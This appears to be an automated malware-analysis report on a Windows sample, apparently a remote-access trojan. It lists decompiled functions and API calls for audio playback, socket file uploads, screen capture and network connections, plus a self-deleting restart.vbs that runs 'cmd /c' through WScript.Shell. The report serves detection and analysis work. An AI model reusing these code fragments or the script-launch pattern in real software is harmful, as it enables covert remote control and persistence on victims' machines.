					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t38, _t37, _t37, _t36, _t36, _t35, _t35, L"open \"",  &_a4, L"\" type ", E013C2795( &_v84, _a20), L" alias audio");
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					mciSendStringW(_t38, 0, 0, 0);
					mciSendStringA("play audio", 0, 0, 0);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
					E013B20C2(0x13cc178, 0xa9, 0x13c5664);
					_t43 = CreateEventA(0, 1, 0, 0);
					 *0x13cc1d4 = _t43;
					if(_t43 != 0) {
						do {
							if( *0x13cc1d2 != 0) {
								mciSendStringA("pause audio", 0, 0, 0);
								 *0x13cc1d2 = 0;
							}
							if( *0x13cc1d3 != 0) {
								mciSendStringA("resume audio", 0, 0, 0);
								 *0x13cc1d3 = 0;
							}
							mciSendStringA("status audio mode",  &_v88, 0x14, 0);
							_t50 = "stopped";
							_t88 =  &_v88;
							while(1) {
								_t86 =  *_t88;
								_t78 = _t86;
								if(_t86 !=  *_t50) {
									break;
								}
								if(_t78 == 0) {
									L14:
									_t50 = 0;
								} else {
									_t87 =  *((intOrPtr*)(_t88 + 1));
									_t79 = _t87;
									if(_t87 !=  *((intOrPtr*)(_t50 + 1))) {
										break;
									} else {
										_t88 = _t88 + 2;
										_t50 = _t50 + 2;
										if(_t79 != 0) {
											continue;
										} else {
											goto L14;
										}
									}
								}
								goto L18;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							L18:
							if(_t50 == 0) {
								SetEvent( *0x13cc1d4);
							}
							if(WaitForSingleObject( *0x13cc1d4, 0x1f4) == 0) {
								CloseHandle( *0x13cc1d4);
								 *0x13cc1d4 = 0;
							}
						} while ( *0x13cc1d4 != 0);
					}
					mciSendStringA("stop audio", 0, 0, 0);
					mciSendStringA("close audio", 0, 0, 0);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
					_t47 = E013B20C2(0x13cc178, 0xaa, 0x13c5664);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t47;
			}






















                                            0x013c1d8a
                                            0x013c1d9b
                                            0x013c1da9
                                            0x013c1dae
                                            0x013c1dbb
                                            0x013c1dc0
                                            0x013c1dc7
                                            0x013c1dd0
                                            0x013c1dd0
                                            0x013c1dd9
                                            0x013c1de4
                                            0x013c1f46
                                            0x013c1f55
                                            0x00000000
                                            0x013c1f5b
                                            0x013c1f69
                                            0x013c1f79
                                            0x013c1f79
                                            0x013c1dea
                                            0x013c1dea
                                            0x013c1df9
                                            0x013c1dff
                                            0x013c1e04
                                            0x013c1e07
                                            0x013c1e24
                                            0x013c1e2d
                                            0x013c1e36
                                            0x013c1e3a
                                            0x013c1e43
                                            0x013c1e47
                                            0x013c1e50
                                            0x013c1e54
                                            0x013c1e5f
                                            0x013c1e68
                                            0x013c1e71
                                            0x013c1e7a
                                            0x013c1e86
                                            0x013c1e8d
                                            0x013c1ea1
                                            0x013c1eb1
                                            0x013c1ec1
                                            0x013c1ecb
                                            0x013c1ed3
                                            0x013c1ed8
                                            0x013c1ede
                                            0x013c1ee4
                                            0x013c1eee
                                            0x013c1ef0
                                            0x013c1ef0
                                            0x013c1efc
                                            0x013c1f06
                                            0x013c1f08
                                            0x013c1f08
                                            0x013c1f1a
                                            0x013c1f1c
                                            0x013c1f21
                                            0x013c1f24
                                            0x013c1f24
                                            0x013c1f26
                                            0x013c1f2a
                                            0x00000000
                                            0x00000000
                                            0x013c1f2e
                                            0x013c1f42
                                            0x013c1f42
                                            0x013c1f30
                                            0x013c1f30
                                            0x013c1f33
                                            0x013c1f38
                                            0x00000000
                                            0x013c1f3a
                                            0x013c1f3b
                                            0x013c1f3d
                                            0x013c1f40
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x013c1f40
                                            0x013c1f38
                                            0x00000000
                                            0x013c1f2e
                                            0x013c1f83
                                            0x013c1f85
                                            0x013c1f88
                                            0x013c1f8a
                                            0x013c1f92
                                            0x013c1f92
                                            0x013c1fab
                                            0x013c1fb3
                                            0x013c1fb9
                                            0x013c1fb9
                                            0x013c1fbf
                                            0x013c1ede
                                            0x013c1fd3
                                            0x013c1fdd
                                            0x013c1fed
                                            0x013c1ffd
                                            0x013c2005
                                            0x013c2005
                                            0x013c200e
                                            0x013c2018

                                            APIs
                                            • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,00000000,?,747DF700), ref: 013C1D9B
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,747DF700), ref: 013C1DAE
                                              • Part of subcall function 013C35DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 013C35EE
                                            • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,747DF700), ref: 013C1DC7
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,747DF700), ref: 013C1DD0
                                            • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,747DF700), ref: 013C1DD9
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,747DF700), ref: 013C1DEA
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013C1DF9
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,open ",?," type ,00000000, alias audio,?,747DF700), ref: 013C1E2D
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,747DF700), ref: 013C1E3A
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,747DF700), ref: 013C1E47
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,747DF700), ref: 013C1E54
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,747DF700), ref: 013C1E5F
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,747DF700), ref: 013C1E68
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,747DF700), ref: 013C1E71
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,747DF700), ref: 013C1E7A
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,747DF700), ref: 013C1E86
                                            • mciSendStringW.WINMM(00000000), ref: 013C1E8D
                                            • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 013C1EA1
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(013C5664,?), ref: 013C1EB1
                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9), ref: 013C1ECB
                                            • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 013C1EEE
                                            • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 013C1F06
                                            • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 013C1F1A
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,747DF700), ref: 013C1F46
                                            • PathFileExistsW.SHLWAPI(00000000,?,747DF700), ref: 013C1F4D
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(013C5664,?), ref: 013C1F69
                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,747DF700), ref: 013C1F92
                                            • WaitForSingleObject.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,?,747DF700), ref: 013C1FA3
                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,747DF700), ref: 013C1FB3
                                            • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 013C1FD3
                                            • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 013C1FDD
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(013C5664,?), ref: 013C1FED
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(000000AA), ref: 013C2005
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013C200E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@SendString$??0?$basic_string@D@2@@std@@D@std@@$?c_str@?$basic_string@G@2@@0@Hstd@@V?$basic_string@$D@1@@$EventV01@@V10@$??4?$basic_string@?find@?$basic_string@?length@?$basic_string@CloseCreateExistsFileG@1@@HandleObjectPathSingleV01@V10@0@V10@@Wait
                                            • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                            • API String ID: 1753768752-1354618412
                                            • Opcode ID: 908c0fd828a61330a7cef3e6c8a04b1d28f628b641f7ccac3eb3729bd7c8bda7
                                            • Instruction ID: b597b513fd5c73588ac6545373c1fbff750bbd35c5ff99ab0cd8ce934f9e519a
                                            • Opcode Fuzzy Hash: 908c0fd828a61330a7cef3e6c8a04b1d28f628b641f7ccac3eb3729bd7c8bda7
                                            • Instruction Fuzzy Hash: 1E6180B1740209AFDB11AFA5EC99DBF3B6DEB64B48F44001DF50296145DA71BD08CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B3473, Relevance: 72.0, APIs: 36, Strings: 5, Instructions: 228networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(Function_0001B300,013C5664,[INFO],[DEBUG],00000000,?,013B41B5,?,?,00000000), ref: 013B3499
                                            • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 013B34AC
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 013B34B5
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 013B34CE
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 013B34DB
                                            • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 013B34F0
                                            • recv.WS2_32(00000000,?,0000FDE8,00000000), ref: 013B3517
                                            • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,00000000,00000000,?,0000FDE8,00000000), ref: 013B3534
                                            • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 013B3541
                                            • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 013B3556
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(013C5664), ref: 013B3560
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000004,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 013B3578
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,nTotBytesRecv: ,00000000,?,?,?,?), ref: 013B35BB
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,nTotBytesRecv: ,00000000,?,?,?,?), ref: 013B35CD
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B35DE
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,FileSize: ,00000000,?,?,?,?), ref: 013B35FB
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,FileSize: ,00000000,?,?,?,?), ref: 013B3608
                                              • Part of subcall function 013C203B: GetLocalTime.KERNEL32(?), ref: 013C2052
                                              • Part of subcall function 013C203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,013C6BFC,?,013C5770,?,?,013B51EF,?), ref: 013C2087
                                              • Part of subcall function 013C203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,013B51EF,?), ref: 013C2094
                                              • Part of subcall function 013C203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,013B51EF,?), ref: 013C20A1
                                              • Part of subcall function 013C203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,013B51EF,?), ref: 013C20AE
                                              • Part of subcall function 013C203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,013B51EF,?), ref: 013C20B8
                                              • Part of subcall function 013C203B: printf.MSVCRT ref: 013C20BF
                                              • Part of subcall function 013C203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B51EF), ref: 013C20CB
                                              • Part of subcall function 013C203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B51EF), ref: 013C20D4
                                              • Part of subcall function 013C203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B51EF), ref: 013C20DD
                                              • Part of subcall function 013C203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B51EF), ref: 013C20E6
                                              • Part of subcall function 013C203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B51EF), ref: 013C20EF
                                              • Part of subcall function 013C203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B51EF), ref: 013C20F8
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B3619
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B362A
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B3633
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 013B36F3
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,?,0000FDE8,00000000), ref: 013B36FE
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B3707
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(File Upload: unexpected disconnection,?), ref: 013B371F
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?), ref: 013B372F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@1@@D@2@@0@V?$basic_string@$Hstd@@$V01@V10@@$??4?$basic_string@?c_str@?$basic_string@V01@@V10@$??9std@@?append@?$basic_string@?empty@?$basic_string@?length@?$basic_string@?size@?$basic_string@LocalTimeV10@0@V12@Y?$basic_string@printfrecv
                                            • String ID: File Upload: unexpected disconnection$FileSize: $[DEBUG]$[INFO]$nTotBytesRecv:
                                            • API String ID: 2510920776-3166941866
                                            • Opcode ID: 691003bbc51464f2faf5d8c7a578064ecd02db348650a164b803e464458c0010
                                            • Instruction ID: d1fd52c9bf7d7761258b3f49e71081f199b4997dff57f5a09c4119dd07c503ba
                                            • Opcode Fuzzy Hash: 691003bbc51464f2faf5d8c7a578064ecd02db348650a164b803e464458c0010
                                            • Instruction Fuzzy Hash: 1C813F71A0011AAFCB15EB94D899DEEBB7DFF14719F000019F606A2554EF70BA89CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B89A6, Relevance: 63.1, APIs: 29, Strings: 7, Instructions: 134COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 013BAC8C: TerminateProcess.KERNEL32(00000000,013C66F0,013B9E75), ref: 013BAC9C
                                              • Part of subcall function 013BAC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 013BACAF
                                            • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 013B89BD
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 013B89C6
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 013B89E4
                                              • Part of subcall function 013BB692: RegOpenKeyExA.KERNELBASE(80000001,013B936A,00000000,00020019,013B936A), ref: 013BB6AC
                                              • Part of subcall function 013BB692: RegQueryValueExA.KERNELBASE(013B936A,?,00000000,00000000,?,?,013CBCC0), ref: 013BB6C8
                                              • Part of subcall function 013BB692: RegCloseKey.KERNELBASE(013B936A), ref: 013BB6D3
                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 013B8A07
                                            • _wgetenv.MSVCRT ref: 013B8A1B
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 013B8A26
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 013B8A31
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B8A3C
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 013B8A49
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,013C623C), ref: 013B8A60
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,?,00000000), ref: 013B8A7A
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 013B8A85
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013B8A92
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 013B8A9F
                                            • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 013B8AAB
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B8AB4
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B8ABD
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B8AC6
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B8ACF
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B8AD8
                                            • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)), ref: 013B8AE6
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 013B8AF0
                                            • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 013B8AFA
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 013B8B06
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(013C5800,013C5800,00000000), ref: 013B8B24
                                            • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 013B8B31
                                            • exit.MSVCRT ref: 013B8B3D
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B8B46
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B8B4F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@G@1@@G@2@@0@Hstd@@V?$basic_string@$D@2@@std@@D@std@@V10@$V01@Y?$basic_string@$?length@?$basic_string@?size@?$basic_string@CloseExecuteFileModuleNameObjectOpenProcessQueryShellSingleTerminateV01@@V10@0@ValueWait_wgetenvexit
                                            • String ID: """, 0$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$\restart.vbs$exepath$open
                                            • API String ID: 864010295-1332127163
                                            • Opcode ID: a5ca28dede588348e1cc8ba32d094a8e0ae85265782c62e7f2d3190a6aa001ff
                                            • Instruction ID: debc8bce496402adb63324a3a7cf76cb32647c75c049ff672518564e87bef5f1
                                            • Opcode Fuzzy Hash: a5ca28dede588348e1cc8ba32d094a8e0ae85265782c62e7f2d3190a6aa001ff
                                            • Instruction Fuzzy Hash: FF413EB2A0010AAFCB15EBA4ED59DEE777CEF68705F500019F506E2144EB757E09CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013BF5F4, Relevance: 56.3, APIs: 31, Strings: 1, Instructions: 265COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 013BFA46: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 013BFA5C
                                              • Part of subcall function 013BFA46: CreateCompatibleDC.GDI32(00000000), ref: 013BFA68
                                              • Part of subcall function 013BFA46: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(013C5664,?), ref: 013BFD20
                                            • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 013BF622
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(013CC0C8), ref: 013BF65F
                                            • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 013BF676
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 013BF680
                                            • SHCreateMemStream.SHLWAPI(00000000), ref: 013BF687
                                            • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,00000000), ref: 013BF6D4
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 013BF70C
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000), ref: 013BF72F
                                            • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0000000A), ref: 013BF755
                                            • _itoa.MSVCRT ref: 013BF75C
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 013BF91A
                                              • Part of subcall function 013B2038: socket.WS2_32(00000000,00000001,00000006), ref: 013B2053
                                              • Part of subcall function 013B209B: connect.WS2_32(013CBE70,013CBE74,00000010), ref: 013B20B1
                                              • Part of subcall function 013B2118: CreateThread.KERNEL32 ref: 013B212D
                                              • Part of subcall function 013C27F5: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,013B464E,?,?,00000055), ref: 013C2804
                                              • Part of subcall function 013C27F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,013B464E,?,?,00000055), ref: 013C280E
                                              • Part of subcall function 013C27F5: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,013B464E,?,?,00000055), ref: 013C2817
                                              • Part of subcall function 013C27F5: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,013B464E,?,?,00000055), ref: 013C2821
                                              • Part of subcall function 013C27F5: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,013B464E,?,?,00000055), ref: 013C282B
